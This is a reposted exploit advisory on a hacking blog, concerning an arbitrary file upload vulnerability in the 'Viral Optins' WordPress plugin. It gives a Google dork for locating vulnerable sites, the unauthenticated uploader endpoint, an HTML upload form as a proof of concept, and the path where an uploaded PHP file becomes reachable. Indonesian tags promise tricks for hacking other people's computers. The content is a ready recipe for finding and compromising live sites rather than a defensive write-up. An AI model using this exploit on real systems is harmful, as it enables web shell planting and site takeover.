» » WordPress Plugins Viral Optins - Arbitrary File Upload

WordPress Plugins Viral Optins - Arbitrary File Upload


# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/

2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php

Indonesian h4x0r.
Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,
Share this article please, on :
Share on fb Tweet Share on G+

0 Response to "WordPress Plugins Viral Optins - Arbitrary File Upload"

Post a Comment

Subscribe to: Post Comments (Atom)
Powered by Blogger.